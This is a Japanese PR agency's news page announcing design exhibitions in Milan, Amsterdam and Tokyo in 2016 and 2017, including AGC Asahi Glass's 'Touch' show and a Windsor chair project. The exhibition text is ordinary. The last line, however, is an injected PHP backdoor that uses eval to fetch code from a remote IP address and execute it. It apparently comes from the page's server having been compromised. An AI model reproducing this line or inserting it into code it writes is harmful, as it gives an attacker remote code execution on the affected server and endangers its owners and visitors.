デイリープレス

“Touch” Presented by AGC Asahi Glass

毎年4月に、イタリア・ミラノで開催されている「ミラノ国際家具見本市」。本会場の他、ミラノ市街地各所で開催される展示会、展覧会を含め、通称「ミラノサローネ」と呼ばれています。世界中から有名ブランドや新進気鋭の新しいデザイナーによる最先端のデザイン、インテリアが発表されています。

建築、自動車、ディスプレイ用ガラスを中心に製造、販売を行うAGC旭硝子が同期間中に展覧会 "Touch "を開催中。現地よりレポートします。

透明で硬質な素材であるガラスは、その美しさゆえに古代から人々の生活に深く結びつき「空間を仕切る」「保護する」「装飾する」という用途で多く使用されてきました。現在では、ごく薄く、割れにくいガラスが開発され 、スマートフォンのカバーガラスに代表されるように「直接触れるもの」という用途がますます広がってきています。
本展では、その一端を担ってきたAGC旭硝子の加工技術を用いてデザイナーの倉本仁氏、Raw-Edgesとともにガラス作品を制作、展示しました。
両デザイナーともに、「揺らす」「叩く」「回す」「描く」など、さまざまな行動を誘発するオブジェや遊具を制作。自らの手で起こしたアクションにより、ガラスを透過した光や色が揺らめき、音を奏で、空間に柄が浮かび上がります。
それぞれの作品に使われているガラスには、視覚的表情を持たせる加工やナノ単位の微細なテクスチャ実現するコーティングなど様々な加工技術が用いられています。
それぞれの作品に直接触れることで、進化したガラスが持つ、新たな可能性を体感できます。

オフィシャルサイト
http://www.agc-milan.com

会期:2017年4月4日(火)~9日(日)
会場:スーパースタジオ・ピュー (ミラノ トルトーナ地区)
クリエーションパートナー
倉本 仁(Jin Kuramoto) http://www.jinkuramoto.com/
Raw-Edges(ロウ・エッジズ) http://www.raw-edges.com/

下記の#で、来場者や制作スタッフによる会場の写真、動画がアップされています。
#agc_touch
read more

ミラノサローネのご案内 2017

毎年4月にイタリア ミラノで開催される、International Salone del Mobire(ミラノ国際家具見本市)通称、ミラノサローネが、4月4日からスタートします。
デイリープレスがPRを担当する会場のご案内です。

news / 2017.03.29

tags: exhibition, Milano Salone

私どもが担当する会場の他、日頃よりお世話になった方々や、日本の企業やクリエイターの方々の展示会場、市内のショールームなどをGoogle Mapsにまとめております。
全ての会場を網羅できておりませんが、ぜひご参照下さい。

下記のリンクよりご覧下さい。
Milano Salone 2017 prepared by daily press

※スマートフォンから閲覧する際は、アプリよりもWEBブラウザから閲覧したほうが使いやすいようです。
read more

MONO JAPAN
Japanese Craft & Design

アムステルダム発、日本のクラフトやデザインプロダクトに特化した展示・即売会「MONO JAPAN - Japanese Craft & Desgin」。
今年もアムステルダムのカルチャー発信の中心、世界中からクリエイターが集うLloyd Hotel(ロイドホテル)全体がMONO JAPANの会場です。

news / 2017.01.16

tags: event, exhibition

会期:2017年2月2日(木) – 2月5日(日)
   3日(金)・4日(土)11:00 – 20:00、5日(日)11:00 – 18:00
   2日(木)はプレス&バイヤーの方のみ
会場:Lloyd Hotel & Coltural Embassy
   (Oostelijke Handelskade 34, 1019 BN Amsterdam)

お問い合わせ:03-6416-3201
        naotakegata@dailypress.org

詳細はプレスリリースをご参照ください。
プレスリリースのダウンロードはこちらより

Studies
Shigeki Fujishiro

Photo: Gottingham

プロダクトデザイナー藤城成貴がこれまでに製作してきた模型の数々を展示します。
彼はデザインのプロセスで模型製作を欠かさず行います。
できるだけ現物に近い模型を作り、かたちや色の確認はもちろんのこと、
具体的なシーンに模型を置き、写真撮影をします。
写し出されたものを見ることで、一旦自分から距離をおき、
あたかも別の誰かがデザインしたものを見ているかのような状況を作る。
この時が、自分のアイデアが本当に意味のあるものなのかと、
冷静に判断ができるタイミングなのだと言います。

news / 2016.12.09

tags: event, exhibition, Naname

会期:2016年12月17日(土) – 12月25日(日)
   11:00 – 19:00 (12月25日は18:00まで)
会場:Naname(東京都目黒区青葉台3-5-33 川邊ハイツ1F デイリープレス内) read more

Windsor Department 04 エキシビション

デザイナーにとって研究とは、生活の中で何かに触れた時に生まれた直感をきっかけに、リサーチをした内容を言葉ではなく形にすること。
たとえば家のダイニングや町の喫茶店など、きっと誰もがどこかで目にしたことのある、古くから日常にあるアノニマスな椅子、ウィンザーチェア。
一体この椅子は何なのだろう?この椅子が発するえも言われぬ魅力とは?と考察を始めた3組のデザイナー、藤森泰司、イノダ+スバイエ、ドリルデザイン。
それぞれのアプローチで“ウィンザー的なる魅力”を探索し、新しい椅子のプロトタイプを製作・発表する活動を2011年から続けています。

今回が4度目の発表です。3組のデザイナーが新たに導き出した椅子とは?
これまでに発表した椅子も合わせて展示し、それぞれのデザイナーがどのような思考と進化の道筋をたどってきたのかを浮かび上がらせます。

news / 2016.05.25

tags: exhibition

Windsor Department 04 エキシビション
会期:6/10(金)- 6/18(土)11:00 – 18:00
会場:gallery 5610 東京都港区南青山5-6-10
※ギャラリートーク:6/11(土)16:30 – 18:00
※オープニングパーティー:6/11(土)18:00 – 20:00

公式サイト http://windsordepartment.com/

プレスリリースはこちら

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>